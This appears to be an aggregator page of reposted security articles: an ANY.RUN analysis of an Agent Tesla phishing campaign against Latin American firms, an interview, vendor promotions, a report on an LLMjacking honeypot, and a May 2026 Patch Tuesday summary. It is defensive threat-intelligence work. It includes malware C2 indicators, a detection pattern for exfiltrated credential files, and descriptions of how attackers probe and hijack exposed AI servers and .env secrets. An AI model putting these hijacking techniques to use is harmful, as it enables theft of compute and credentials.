HUNTING [ANY.RUN] Windows PC hostname observed in outbound connection
HUNTING [ANY.RUN] Host CPU Enumeration observed in outbound connection
5. Threat Infrastructure Analysis
The C2 Server: 89.39.83.184
The exfiltration target — ftp.horeca-bucuresti[.]ro resolving to 89[.]39[.]83[.]184 — is a legitimate Romanian hospitality business website that has been compromised and repurposed as a drop zone. This operational security tactic makes network blocking harder and attribution more difficult, since blocking the IP may affect a legitimate business.
Querying the IP on VirusTotal reveals 80 malicious files that have communicated with this server, with the earliest samples dating to September 2024 — confirming the infrastructure has been actively maintained for at least 18 months.
Files communicating with the C2 server
Campaign Scope: A LATAM-Focused Operation
Analysis of the 80 samples communicating with this infrastructure reveals a clear targeting pattern focused on Spanish-speaking Latin American enterprises. Pivoting on the campaign in ANY.RUN Threat Intelligence Lookup with the query submissionCountry:”cl” AND threatLevel:”malicious” confirms Chile as the primary submission country, and surfaces correlated behavioral artifacts including the mutex localsm0:6816:304:wilstaging_02, the Firebase Storage decoy PDF download URL, and all 10 Suricata network threats – all tied to aspnet_compiler.exe as the injected process.
Malicious file search in TI Lookup
The filenames observed in the communicating files paint a consistent picture:
Filename
Type
Targeting Context
Orden de compra.xlam / Orden de Compra.xlam
Office macro lure
Chile / Peru / Generic LATAM
OC 20240814.xlam / OC 20240813.xlam
Office macro lure
Dated purchase orders
Nómina de sueldos.pdf_008.exe
EXE disguised as PDF
Payroll – HR department targeting
Comprobante de pago.pdf.exe
EXE disguised as PDF
Payment receipt – finance targeting
Nomina_Sept2025_Confidencial.xlam
Office macro lure
Confidential payroll – HR targeting
Orden – N652120.008.xlam
Office macro lure
Numbered order – supplier targeting
givingbestthingsalwaysfor.hta
HTA dropper
English – possible wider targeting
The Passive DNS history further reveals that the same IP hosted subdomains used as email relay infrastructure: email.v.todotramitesperu.com.elgartizocon[.]ro and email.elrif[.]com — patterns consistent with mail relay abuse to increase phishing email deliverability.
6. MITRE ATT&CK Mapping
Technique
ID
Evidence
Phishing: Spearphishing Attachment
T1566.001
RAR archive with financial lure delivered via email
Obfuscated Files or Information
T1027
JScript Encoded .jse dropper evades AV
Command and Scripting: JavaScript
T1059.007
wscript.exe executes .jse dropper
Command and Scripting: PowerShell
T1059.001
Stager with -ExecutionPolicy Bypass
Process Injection: Process Hollowing
T1055.012
ALTERNATE.dll injected into aspnet_compiler.exe
Software Packing / Virtualization
T1027.002
.NET Reactor 6.x with VM + control flow obfuscation
Credentials from Web Browsers
T1555.003
Chrome, Firefox credential store access confirmed
Exfiltration Over Alternative Protocol: FTP
T1048.003
Cleartext FTP to ftp.horeca-bucuresti.ro:21
System Information Discovery
T1082
CPU, RAM, OS version enumeration pre-exfil
System Network Configuration Discovery
T1016
External IP lookup via ip-api.com
Early Detection: Using ANY.RUN Against Agent Tesla Campaigns
ANY.RUN’s Interactive Sandbox is particularly effective for early detection of sophisticated multi-stage loaders like this Agent Tesla campaign. Security teams should integrate the following practices:
Proactive Sample Submission: Upload suspicious attachments (especially RAR archives with non-standard extensions like .uu, .jse, or macro-enabled Office files) immediately upon receipt for interactive analysis.
Behavioral Monitoring: Use ANY.RUN’s real-time process tree visualization and Suricata rule matching to identify Process Hollowing into aspnet_compiler.exe, PowerShell stagers, and FTP exfiltration patterns.
Threat Intelligence Pivoting: After identifying a C2 indicator (e.g., ftp.horeca-bucuresti[.]ro or IP 89.39.83[.]184), pivot within ANY.RUN Threat Intelligence to uncover related samples and campaign scope.
Team Training: Conduct regular red-team exercises in the interactive environment to train analysts on recognizing .NET Reactor-protected loaders and fileless execution techniques.
Automated Workflows: Integrate ANY.RUN via API for high-volume email gateway triage, enabling rapid quarantine of matching threats before they reach end users.
This investigation yields several actionable findings for security teams in Chile and the broader LATAM region:
The campaign is persistent, not opportunistic
The threat actor has operated continuously since at least mid-2024 using the same FTP infrastructure (89.39.83[.]184) while iterating on lure documents. This is a sustained operation with deliberate LATAM focus.
Dynamic analysis is non-negotiable for this family
.NET Reactor 6.x with virtualization and control flow obfuscation significantly raises the cost of static analysis. Organizations relying solely on static AV will miss this family. Dynamic analysis in sandboxes like ANY.RUN provides the detection coverage that static tools cannot.
Despite being a decades-old protocol, FTP exfiltration continues to succeed because most organizations focus monitoring on HTTP/S. Since FTP operates in cleartext, when it is captured, full credentials and data content are visible — but only if outbound FTP traffic is logged and inspected.
Financial and procurement roles are high-value targets
The consistent use of purchase order and payment receipt lures indicates deliberate targeting of accounts payable and procurement departments. Targeted security awareness training for these roles represents a high-ROI defensive investment.
How ANY.RUN Accelerated This Investigation
Several phases of this investigation would have been significantly slower or impossible without ANY.RUN. Here is where the platform made a direct impact:
Interactive Detonation
Unlike fully automated sandboxes, ANY.RUN’s interactive environment allowed real-time observation of the infection chain. This was critical for the .jse stage, which checks for user interaction before proceeding — a common evasion technique that automated systems fail to bypass.
Agent Tesla detonated in ANY.RUN Sandbox
Automatic Network Threat Detection
ANY.RUN matched 6 Suricata rules against the network traffic automatically, immediately confirming the Agent Tesla family and the FTP exfiltration behavior. In a traditional lab setup, this would require manual PCAP capture, Wireshark analysis, and custom rule development.
Cleartext FTP Capture
The cleartext FTP session — including the authentication handshake, the C2 hostname (ftp.horeca-bucuresti[.]ro), and the exfiltrated filename pattern — was captured in full by ANY.RUN’s network interception layer and presented directly in the Network tab, reducing analysis time from hours to minutes.
Threat Intelligence Pivoting
Using the C2 IP as a pivot point in ANY.RUN Threat Intelligence (combined with VirusTotal), we surfaced 80 related malicious samples, identified the 18-month campaign timeline, and mapped the full scope of LATAM targeting — transforming a single sample investigation into a comprehensive campaign report.
ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. They help security teams understand threats faster, make informed decisions, and operationalize threat intelligence across detection, investigation, and response workflows.
Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN is SOC 2 Type II certified, ensuring strong security controls and protection of customer data.
Q1: What makes this Agent Tesla campaign different from others?
It uses a sophisticated .NET Reactor-protected loader with Process Hollowing and has operated persistently against LATAM targets for over 18 months using the same infrastructure.
Why are Chilean companies specifically targeted?
Rapid digitalization, prevalent use of email for business documents, and relatively lower security maturity in SME supply chains.
Can standard antivirus stop this attack?
Often not. The heavy obfuscation, fileless execution, and legitimate process injection frequently bypass static AV. Dynamic analysis is critical.
What should employees do when receiving a suspicious purchase order?
Verify the sender through a separate channel and avoid opening attachments from unexpected sources.
How can we detect the FTP exfiltration?
Monitor outbound FTP traffic (port 21) and look for filenames starting with “PW_” followed by username and hostname.
How can ANY.RUN help my security team?
It provides interactive detonation, automatic threat detection, and intelligence pivoting that accelerate both analysis and proactive defense.
In the latest Humans of Talos, Amy sits down with Senior Vulnerability Researcher Philippe Laulheret to demystify the world of ethical hacking. Philippe shares his unique journey from French engineering school to the front lines of cybersecurity, explaining how his lifelong love for solving puzzles helps him uncover critical security flaws before they can be exploited.
From his memorable experiment using a green onion to bypass a biometric fingerprint reader to his perspective on the reality of cybersecurity versus what we see in the movies, Philippe provides a fascinating look at the work that keeps our digital world safe.
Amy Ciminnisi: So, can you talk to me a little bit about what you do in vulnerability research?
Philippe Laulheret: I work in vulnerability research. Basically, my job is to find vulnerabilities in software, hardware, or things physically. It’s an interesting position because I usually get to choose which target I want to look at, which confuses people usually, because usually it’s a consulting role, or someone asks you to do that. But for us, we find vulnerabilities in things that we think are important. And then this way, people in different teams can write detection rules, and our customers are protected.
AC: I love that you get to kind of pick a niche and explore. How did you get into this?
PL: My deepest interest was more in reverse engineering, which is understanding how things work, software in particular. Throughout my whole life, I was really curious and really wanted to understand stuff. I guess research is an extension of that where you need to understand how the system works, and then it’s a puzzle where you need to find a way to break it. In my teenage years, I was really interested in that. I started playing Capture The Flag, which are challenges where people design exercises where there is a bug to find and exploit. It was really fun. I was doing that to stay sharp with my skills, and eventually, I was able to transition from regular development work to actual research. All those years of playing CTF really helped, even if it wasn’t professional.
AC: Did you go to school initially for development work? What kind of career path led you here?
PL: Originally, as you can hear, I have a French accent. In France, we have engineering schools, which are fancy grad schools. The process is first you study very hard in math and physics, and then you go to grad school. At that time, I was convinced I wanted to do security, and I joined an electrical and computer engineering school. Somehow, in that school, I discovered an interest for different aspects of software development. I was getting interested in computer vision and other things. When I moved to the U.S. for development work instead of security work, I worked in a design studio for four years, which was really fun. I was making interactive installations. But as I said, I was playing CTF on the side to keep security pretty high in my head. Eventually, I moved to New York and joined a cybersecurity startup, and finally, I moved back to the Pacific Northwest, where I’m currently living, and I was finally able to do vulnerability research the way I wanted to.
Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-05-13 11:06:392026-05-13 11:06:39Breaking things to keep them safe with Philippe Laulheret
Successful SOC operations require more than accurate detections. Instant access to context, clear conclusions, and operationally relevant insights allow incidents to move across workflows without delays:
During alert triage, analysts need a quick threat overview to decide on the next steps.
Efficient incident response decisions demand clear, actionable context to rely on.
Swift incident reporting requires cross-tier visibility without the need for manual processing of raw technical data.
Making ANY.RUN’s Interactive Sandbox a part of your standard SOC workflow helps eliminate bottlenecks that occur along the incident lifecycle by contributing to the optimization of each process, decision, and report.
SOC-ready Tier 1 reports turn complex sandboxing analysis into structured, decision-ready intelligence for faster, efficient triage, escalation, response, and reporting.
Executive Summary
Whether operating as an internal SOC or delivering MDR and MSSP services, organizations need investigation workflows that scale efficiently under growing alert volumes.
ANY.RUN’s Interactive Sandbox with Tier 1 Reports helps standardize triage, escalation, and incident reporting by becoming a decision-support layer for your security operations.
Enterprise Suite teams can optimize sandbox investigations and reporting across the SOC at scale with unlimited Tier 1 report generation.
The result is faster investigations, consistent escalations with less context lost, and optimized incident documentation for confident decisions and risk prioritization.
Challenges SOC Teams Face Today
With SOC teams continuously investigating suspicious files, URLs, phishing pages, and malware samples, turning the resulting massive volume of technical findings into actionable operational context fast enough to support efficient response becomes the key challenge.
The lack of standardized reporting leads to:
Slow triage due to excessive manual work for Tier 1
Higher pressure on Tier 2/3 and incident response team due to lack on ready-to-apply context
Context loss during escalations and critical delays occur
Additional burden falling on SOC managers without clear visibility into incident severity and business impact
ANY.RUN’s Interactive Sandbox already simplifies malware and phishing analysis through interactive, real-time investigation. Now, with Tier 1 Reports and AI Summary, it supports decision-making and reporting acrossSOC operations.
Phishing sample analysis in ANY.RUN Sandbox
SOC-Ready Reporting Built Into the Analysis Workflow
New Tier 1 reports are integrated into SOC workflows through and offer complete, structured documents with operationally useful insights.
Tier 1 report includes:
A clear verdict on the analyzed sample
AI Summary featuring threat classification and executive summary
They can be generated directly within the Interactive Sandbox in a single click, making sandbox analysis immediately usable across operational workflows.
Clarity for analysts. Visibility for decision-makers. Faster response across the SOC.
Use Case #1: Fast Threat Understanding for Tier 1 During Triage
Via Tier 1 reports featuring AI Summaries, ANY.RUN’s Interactive Sandbox provides immediate answers to the most critical questions that occur during alert triage:
Is the sample malicious?
What behavior indicates that?
What type of threat is involved?
What MITRE ATT&CK TTPs and IOCs are present?
Does the incident require escalation?
Threat verdict and tags at the top of Tier 1 reports already provide key info on the analyzed object
Instead of manually reviewing raw technical data to answer these questions with confidence, the sandbox provides this context automatically in the form of a ready-to-use report that covers all findings into a clear operational document for fast and substantiated decision-making.
Use Case #2: Easy Access to Context for Tier 2, Tier 3, IR teams
In case of an escalation, Tier 2 analysts and incident responders frequently need to reconstruct investigation context manually before proceeding with containment.
Raw sandbox outputs take time to process and interpret, stretching investigation time and creating friction, as higher tiers essentially have to go back to triage stage for verification.
With Tier 1 reports, analysts get a structured information to pass on at the early stage, making ANY.RUN’s Interactive Sandbox more smoothly embedded into the entire investigation cycle, from triage to response.
Use Case #3: Immediate Clarity for Decision-Makers
SOC managers, Heads of SOC, and CISOs don’t have time to review every technical artifact associated with an incident. Traditional reports may contain too many low-level details, whereas security leaders must assess the general business impact and urgency of a threat.
ANY.RUN’s Interactive Sandbox optimizes the hand-off workflow with a concise overview of the analysis in operational language suitable for leadership.
With AI Summary as part of the structure, the report explains what happened, why the object is malicious, which assets or systems may be at risk.
As a result, analysis outputs become standardized and practical, making them immediately usable for decision-making and internal communication.
ANY.RUN’s Interactive Sandbox & Tier 1 Reports
Operational Impact
Business Impact
Faster incident understanding
Better executive visibility
Easier communication between teams
Faster prioritization through clarity
Consistent incident documentation
Stronger operational governance
Hands-On Case: Generating a Response-Ready Report on a Phishing Attack
In this phishing investigation, the Tier 1 report provides a clear, operational overview of the entire attack chain, helping both analysts and leadership quickly understand the threat severity and required response actions.
AI Summary further structures the findings into operationally relevant context suitable for triage, escalation, and internal communication:
AI Summary providing a clear, structured overview of the threat
The AI summary highlights the detection of a ClickFix phishing technique, followed by PowerShell execution with Execution Policy bypass attempts used to launch malicious activity on the host. It also outlines payload delivery behavior, subsequent system modifications, and persistence attempts through Windows Registry changes.
Instead of manually reconstructing the attack flow from raw sandbox telemetry, analysts receive a ready-to-use interpretation of the incident that can immediately support escalation and response workflows.
The complete attack chain, behavioral indicators, and resulting conclusions are already structured for operational use and are ready for further processing: escalation, IR hand-off, and containment.
Turn sandbox analysis into confident SOC decisions
with interactive investigations and refined reporting
From Analysis to Action: Faster Escalations, Response, and Reporting
The new Tier 1 reports featuring AI Summary deliver direct operational value across the SOC:
Faster Triage: Tier 1 analysts can quickly understand the nature of the threat and make confident decisions on whether to close or escalate alerts.
Streamlined Escalation Process: Tier 2 and IR teams receive well-structured context instead of raw data, reducing handoff time and miscommunication.
Accelerated Incident Response: Teams gain rapid visibility into attack behavior, helping reduce Mean Time to Respond (MTTR).
Improved Internal Reporting: SOC managers and CISOs get consistent, professional summaries that are easy to read and share with stakeholders.
More Consistent Performance: Standardized reports reduce quality variation between analysts and lower the risk of human error.
Unlimited access is available for Enterprise Suite and Hunter plans. Free plan users have a shared limit of 5 generations for both the Tier 1 report and AI Summary.
Conclusion
ANY.RUN’s new Tier 1 reports and AI Summary convert sandbox analysis outputs into structured, operationally ready documents that support every stage of the incident lifecycle, from initial triage to executive visibility.
Embedding Interactive Sandbox directly into a SOC workflow strengthens overall security operations maturity by allowing for faster and more confident decision-making across processes.
About ANY.RUN
ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. They help security teams understand threats faster, make informed decisions, and operationalize threat intelligence across detection, investigation, and response workflows.
Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN is SOC 2 Type II certified, ensuring strong security controls and protection of customer data.
SOC-ready reports are sandbox analysis summaries that provide operational context for faster triage, escalation, incident response, and internal reporting.
Are Tier 1 reports designed only for Tier 1 analysts?
No. While Tier 1 reports are designed to accelerate initial triage, they also support Tier 2, Tier 3, incident response teams, SOC managers, and CISOs by providing structured operational context, standardized reporting, and fast visibility into threat severity and business impact.
What is included in ANY.RUN Tier 1 reports?
Tier 1 reports include a threat verdict, AI Summary, MITRE ATT&CK mapping, behavioral indicators, and IOCs generated directly from Interactive Sandbox analysis.
How does AI Summary improve incident response?
AI Summary converts technical sandbox findings into concise operational explanations that help analysts and decision-makers quickly assess threat severity, business impact, and required response actions.
Can ANY.RUN reports support SOC and MDR workflows?
Yes. ANY.RUN’s SOC-ready reporting helps standardize triage, escalation, and investigation workflows across internal SOC, MDR, and MSSP teams.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-05-13 09:06:422026-05-13 09:06:42New SOC-Ready Reporting for Faster Triage, Escalation, and Incident Response with ANY.RUN
AI security covers more than just data theft prevention, restricting rogue AI agents, or stopping assistants from giving harmful advice. A relatively simple but rapidly scaling threat has emerged: attempts to hijack computational power and exploit someone else’s neural network for personal gain. This is known as LLMjacking. With AI compute costs widely predicted to surge dramatically, the number of attackers driven by these motives is poised to grow. Consequently, when deploying proprietary AI servers and their supporting ecosystems like RAG or MCP, it’s critical to establish rigorous security measures from day one.
Statistics from a honeypot
The speed and scale of these resource-hijacking attempts are best illustrated by an experiment documented in detail in April 2026. The investigator configured a Raspberry Pi to masquerade as a high-performance private AI server, and made it accessible from the internet. When queried, it reported the availability of Ollama, LM Studio, AutoGPT, LangServe, and text-gen-webui servers — all tools commonly used as wrappers for locally hosted AI models. The server also appeared ready to accept API requests in the OpenAI format, which has become the industry standard.
All these services were seemingly powered by a local instance of Qwen3-Coder 30B Heretic, one of the most powerful open-source models, with its safety alignment removed. To throw in a sweetener, the honeypot reported the presence of various RAG databases and an MCP server with tempting capabilities like get_credentials on board.
In reality, the Raspberry Pi was simply hosting 500 pre-saved responses from an actual Qwen3 model, with a lightweight script selecting the most relevant answer for each incoming query. This setup was enough to pass a superficial check while allowing the researcher to probe the attackers’ intentions.
According to the author, Shodan, a popular internet scanning service, discovered the server within three hours of its going live. Just one hour later, requests resembling capability reconnaissance began pouring in. Over the following month, the server handled more than 113 000 requests from thousands of unique IPs, with 23% of that traffic specifically targeted at discovering AI capabilities and exploiting local LLMs and AI agents.
Requests to endpoints like /api/tags and /v1/models allow attackers to fingerprint which models are hosted on a server, while scanning for /.cursor/rules typically precedes an attempt to exploit an AI agent. Similarly, checking /.well-known/mcp.json serves as an inventory of the victim’s MCP servers. While the author makes no mention of the total number of attacks that progressed beyond simple scanning, there were 175 active attempts to hijack the LLM during the final week of the experiment alone.
What are the attackers after?
Based on the researcher’s observations, none of those targeting the decoy server attempted to execute arbitrary code or gain root access. (Editorial note: this is surprising and may point to gaps in logging.) Almost all attacks were aimed at siphoning resources. For example, the following activities were logged during the experiment:
A well-structured attempt to parse technical documentation for a microprocessor
A prompt to write an erotic novel
Requests to parse and structure social media text data regarding new vulnerabilities
An attempt to call Anthropic models using the compromised server as an API proxy
It’s worth noting that the reconnaissance of AI resources uses standardized and rapidly evolving tools. Requests from an application named LLM-Scanner originated from the infrastructure of seven different cloud providers across eight countries, suggesting that the raiders have put established methodologies in place, as well as specialized platforms for sharing techniques. By the third week of the experiment, the scanner had been updated with an additional check: it now used simple abstract questions to determine whether it’s interacting with live AI or a honeypot returning canned responses.
Among the non-specific attacks, the experiment recorded numerous attempts to exfiltrate credentials from the .env file. Attackers systematically hunted for this file across every conceivable directory on the server. Leaving an .env file publicly accessible is one of the most elementary mistakes when deploying projects on Laravel, Node.js, and other frameworks, yet it remains a common oversight — particularly among beginners and vibe coders. Consequently, attackers have every reason to expect their efforts to pay off.
Conclusions and defense tips
Scanning publicly accessible servers and attempting to exploit them is nothing new, but the rise of LLMs gives attackers another way to monetize their efforts — one that’s both highly lucrative for them and devastating for their victims. To understand how massive these attacks could become, look at their closest counterpart: the cryptojacking market — where criminals mine cryptocurrency using stolen computational resources. That market grew by 20% in 2025 alone. As AI-powered solutions proliferate, and as major providers hike subscription costs while local AI chips remain in short supply, we should expect LLMjacking to become an industrial-scale phenomenon.
Key defensive measures for private AI infrastructure
For AI systems running locally on a single machine, ensure that servers like LM Studio, Ollama, or similar are configured to accept connections only on the local interface (localhost), rather than all available network interfaces. This restricts LLM access to the host machine itself, and prevents the AI from being reachable over the internet.
For servers handling remote requests — even if the server only operates within a local corporate network — implement robust authentication and authorization rather than relying solely on API key validation. Solutions based on OIDC or OAuth2 with short-lived tokens are the most effective. This not only defends against LLMjacking, but also allows for more granular tracking of user activity, and prevents API key abuse. Furthermore, keys must be protected from more than just external attackers; a growing risk is the misuse of keys by AI agents themselves. This applies to LLM interfaces as well as MCP, RAG, and others.
Use network segmentation and IP allowlists to give AI server access only to the departments, employees, and services that require it.
Ensure that all client-server connections are secured with a current version of TLS.
Apply the principle of least privilege by separating access to specific services; for instance, MCP and LLM components should have their own distinct access tokens.
Ensure an EDR security agent is installed on all workstations and servers, including those hosting AI models.
Monitor AI resource consumption, establish usage quotas for different employee roles, and set up alerts for anomalous activity spikes.
Maintain detailed logs of LLM responses and requests made to the model and its supporting tools. Integrate these data sources with your SIEM. Ensure logs are resilient against tampering or deletion.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-05-12 21:06:372026-05-12 21:06:37LLMjacking: what these attacks are, and how to protect AI servers
Microsoft has released its monthly security update for May 2026, which includes 137 vulnerabilities affecting a range of products, including 31 that Microsoft marked as “critical”.
In this month’s release, Microsoft has not observed any of the included vulnerabilities being actively exploited in the wild. Out of 31 “critical” entries, 16 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including Microsoft Office, Microsoft Word, Windows Native WiFi Miniport Driver, Azure, Office for Android, Microsoft Dynamics 365, Windows GDI, Microsoft SharePoint, Windows Graphics Component, Windows Netlogon, and Windows DNS Client.
CVE-2026-32161 is a critical use after free vulnerability. Concurrent execution using a shared resource with improper synchronization (‘race condition’) in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.
CVE-2026-33109 is a critical access control vulnerability in Azure Managed Instance for Apache Cassandra. Improper access control allows an authorized attacker to execute code over a network.
CVE-2026-33844 is a critical input validation vulnerability in Azure Managed Instance for Apache Cassandra. Improper input validation allows an authorized attacker to execute code over a network.
CVE-2026-35421 is a critical heap-based buffer overflow vulnerability in Windows GDI that allows an unauthorized attacker to execute code locally. For this vulnerability to be exploited, a user would need to open or otherwise process a specially crafted Enhanced Metafile (EMF) file using Microsoft Paint. This action is necessary to trigger the affected graphics functionality in the Windows component.
CVE-2026-40358 is a critical use after free vulnerability in Microsoft Office which allows an unauthorized attacker to execute code locally.
CVE-2026-40361 is a critical use after free vulnerability in Microsoft Word that allows an unauthorized attacker to execute code locally.
CVE-2026-40363 is a critical heap-based buffer overflow in Microsoft Office which allows an unauthorized attacker to execute code locally.
CVE-2026-40364 is a critical heap-based buffer overflow vulnerability. Access of resource using incompatible type (‘type confusion’) in Microsoft Office Word allows an unauthorized attacker to execute code locally.
CVE-2026-40365 is a critical vulnerability affecting Microsoft SharePoint. Insufficient granularity of access control allows an authorized attacker to execute code over a network. In a network-based attack, an authenticated attacker, as at least a Site Owner, could write arbitrary code to inject and execute code remotely on the SharePoint Server.
CVE-2026-40366 is a critical use after free vulnerability in Microsoft Word which allows an unauthorized attacker to execute code locally.
CVE-2026-40367 is a critical vulnerability affecting Microsoft Word. An untrusted pointer dereference may allow an unauthorized attacker to execute code locally.
CVE-2026-40403 is a critical heap-based buffer overflow vulnerability in Windows Win32K – GRFX that allows an authorized attacker to execute code locally. This vulnerability could lead to a contained execution environment escape. In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with a vulnerable Remote Desktop Client.
CVE-2026-41089 is a critical stack-based buffer overflow in Windows Netlogon that allows an unauthorized attacker to execute code over a network. An attacker could send a specially crafted network request to a Windows server that is acting as a domain controller. If successful, this could cause the Netlogon service to improperly handle the request, potentially allowing the attacker to run code on the affected system without needing to sign in or have prior access.
CVE-2026-41096 is a critical heap-based overflow vulnerability in Windows DNS Client. An attacker could exploit this vulnerability by sending a specially crafted DNS response to a vulnerable Windows system, causing the DNS Client to incorrectly process the response and corrupt memory. In certain configurations, this could allow the attacker to run code remotely on the affected system without authentication.
CVE-2026-42831 is a critical heap-based buffer overflow vulnerability in Office for Android that allows an unauthorized attacker to execute code locally. An attacker must send a user a malicious Office file and convince them to open it.
CVE-2026-42898 is a critical code injection vulnerability in Microsoft Dynamics 365 (on-premises). Improper control of generation of code (‘code injection’) allows an authorized attacker to execute code over a network. An attacker with the required permissions could modify the saved state of a process session in Dynamics CRM and trigger the system to process that data, which could result in the server unintentionally executing malicious code.
Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that their exploitation is “more likely:”
CVE-2026-33835: Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2026-33837: Windows TCP/IP Local Elevation of Privilege Vulnerability
CVE-2026-33840: Win32k Elevation of Privilege Vulnerability
CVE-2026-33841: Windows Kernel Elevation of Privilege Vulnerability
CVE-2026-35416: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2026-35417: Windows Win32k Elevation of Privilege Vulnerability
CVE-2026-40369: Windows Kernel Elevation of Privilege Vulnerability
CVE-2026-40397: Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2026-40398: Windows Remote Desktop Services Elevation of Privilege Vulnerability
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 1:66438-1:66445, 1:66451-1:66460, and 1:66470-1:66476.
The following Snort 3 rules are also available: 1:301494-1:301497, 1:301500-1:301506, 1:66472-1:66473, and 1:66476.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-05-12 21:06:372026-05-12 21:06:37Microsoft Patch Tuesday for May 2026 — Snort rules and prominent vulnerabilities
Security teams don’t lack data. They lack timely, usable intelligence. Analysts spend too much time validating indicators, switching between tools, and figuring out what actually matters. This introduces delays and puts organizations at risk of a missed incident.
ANY.RUN solves this by bringing real-time, behavior-validated threat intelligence from ANY.RUN integrated into Elastic Security, where SOC and MSSP teams detect emerging cyberattacks earlier and respond faster without changing their workflows.
ANY.RUN Threat Intelligence Feeds x Elastic Security: About the Integration
Elastic Security unifies SIEM, endpoint security, and cloud security to help teams protect, investigate, and respond to threats.
Through the ANY.RUN Threat Intelligence Feeds integration, organizations can ingest third-party threat indicators into Elastic Security and use them in detection, investigation, and threat intelligence workflows. This helps analysts bring external threat context into the same platform they use for security operations.
ANY.RUN’s Threat Intelligence Feeds are built from live sandbox investigations across more than 15,000 organizations and 600,000 SOC professionals. Indicators reflect infrastructure actively used in phishing, malware delivery, and attacker campaigns, not delayed or aggregated data. Each IOC includes context and a direct link to the sandbox report, allowing analysts to quickly understand threat behavior and TTPs.
IOC overview of Threat Intelligence Feeds inside Elastic Security
Once configured, Elastic Security can ingest indicators such as IPs, domains, and URLs from the integration on a scheduled basis. Those indicators can then be used across supported detection, investigation, and visualization workflows.
The additional context associated with ingested indicators can help analysts triage and investigate alerts more efficiently.
Bring fresh, sandbox-backed IOCs into your SOC workflows.
Give your team the context to investigate faster and reduce business risk.
How Threat Intelligence Feeds Improve Detection and Shorten MTTR in Elastic Security
The integration embeds threat intelligence directly into daily SOC workflows inside Elastic Security. Analysts don’t need to manually check indicators in external tools or move data between systems.
Here is what your team gains:
Detect threats early: Use fresh indicators from live attacks to identify malicious activity sooner.
Validate alerts with real context: Use sandbox-backed evidence instead of relying only on static indicators.
Reduce manual work: Eliminate repetitive enrichment steps and tool switching.
Improve detection quality: Use high-confidence indicators directly in rules and correlation logic.
Speed up triage and response: Access context instantly and make faster decisions.
Together, these improvements help reduce MTTD and MTTR, lower incident response costs, and increase analyst efficiency by enabling teams to handle more cases without expanding headcount.
Better detection coverage and earlier visibility into active threats contribute to overall business risk reduction by limiting the impact and spread of attacks.
How to Set Up ANY.RUN’s Threat Intelligence Feeds in Elastic Security
The integration is designed to be simple and flexible. Once you get an active TI Feeds access, you can navigate to the integration page and follow the instructions.
Indicators are automatically ingested into Elastic and continuously updated. They become part of detection, search, and response workflows.
With ANY.RUN Threat Intelligence Feeds in Elastic Security, teams can:
Use ingested ANY.RUN indicators in Elastic Security detection workflows
Match threat indicators against relevant security telemetry
Support triage and investigation with additional indicator context
Build dashboards and visualizations for threat intelligence monitoring
Incorporate third-party indicators into detection and hunting workflows
Conclusion
With ANY.RUN Threat Intelligence Feeds integrated into Elastic’s Security platform can further enhance customer’s security detection with timely, behavior-validated intelligence., Organizations can detect threats early, reduce manual effort, and make fast, confident decisions.
This leads not only to better SOC performance, but also to measurable business impact. Early detection, fast response, and improved signal quality help reduce the likelihood and impact of incidents, ultimately lowering overall business risk.
About ANY.RUN
ANY.RUN helps security teams understand threats faster and take action with confidence. Its solutions are trusted by over 600,000 security professionals and more than 15,000 organizations across industries where speed and accuracy are critical for effective response.
ANY.RUN’s Interactive Sandbox allows teams to safely analyze suspicious files and URLs, observe real behavior in real time, and confirm threats before they spread.
State-sponsored actors don’t break in. They log in, and they use your own tools to stay invisible for months.
Responding to a state-sponsored threat is nothing like responding to ransomware, and the differences can make or break the outcome.
From logging and baselines to OT segmentation and supply chain readiness, the work that matters happens long before the first alert.
Most organizations operate under the assumption that anything residing within their trust boundary is trustworthy. Software arrives from vetted vendors, employees pass background checks, cloud providers hold compliance certifications, and build pipelines produce signed artifacts.
In practice, these assumptions are rarely scrutinized, and state-sponsored actors have constructed their operational methodology around exploiting precisely this gap. They operate inside the trust boundary, using trusted tools, holding valid credentials, and performing actions that appear entirely authorized. Conventional security architecture is not designed to identify this, and that limitation warrants acknowledgment before turning to what incident response looks like when the adversary is a state-sponsored.
Responding to a state-sponsored intrusion is fundamentally different from responding to a criminal one. The adversary is better resourced, more patient, operationally disciplined, and often in pursuit of objectives that do not trigger any alarms, such as espionage or long-term data extraction. Standard incident response playbooks, typically built around malware containment and ransomware recovery, are not adequate for this category of threat. The tooling, decision-making, legal coordination, and even the definition of what constitutes a successful response all need to be reconsidered.
This is also the context in which zero trust architecture becomes essential. This is a fundamental reorientation from a model in which trust is assumed to one in which it is continuously verified, and in which systems are architected to handle the case where verification fails. The operative principle is not “trust nothing,” which no organization can realistically operationalize, but rather “verify continuously and plan for failure.”
